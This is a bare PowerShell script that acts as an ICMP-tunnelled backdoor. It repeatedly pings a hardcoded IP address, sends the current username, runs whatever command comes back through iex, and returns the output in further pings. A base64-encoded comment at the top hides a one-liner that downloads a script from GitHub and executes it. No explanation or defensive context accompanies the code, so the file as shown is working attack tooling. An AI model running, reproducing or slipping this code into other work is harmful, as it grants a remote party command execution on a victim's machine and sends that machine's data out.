<# aQB3AHIAIAByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQwBsAGkAYwBrAGUAcwB0AC8AYQAvAG0AYQBzAHQAZQByAC8AaQBjAG0AcAAtAGMAbABpAGUAbgB0AHwAaQBlAHgA #>

if(-not $sleep){ $sleep = 10 }
if(-not $maxsleep){ $maxsleep = 10 * 6 * 60 }
$currentsleep = 0; $target = '40.74.51.247';
while ($currentsleep -lt $maxsleep) {
    $ICMPClient = New-Object System.Net.NetworkInformation.Ping
    $r=$ICMPClient.Send($target, 10, ([text.encoding]::ASCII).GetBytes($env:USERNAME))
    $r=[System.Text.Encoding]::ASCII.GetString($r.Buffer)
    if ($r -match '^c:(..*)$') {
        $out = iex $matches[1] 2>&1|out-string
        $ICMPClient.Send($target, 10, ([text.encoding]::ASCII).GetBytes("r:$out"))
    }

    $currentsleep += $sleep
    start-sleep $sleep
}
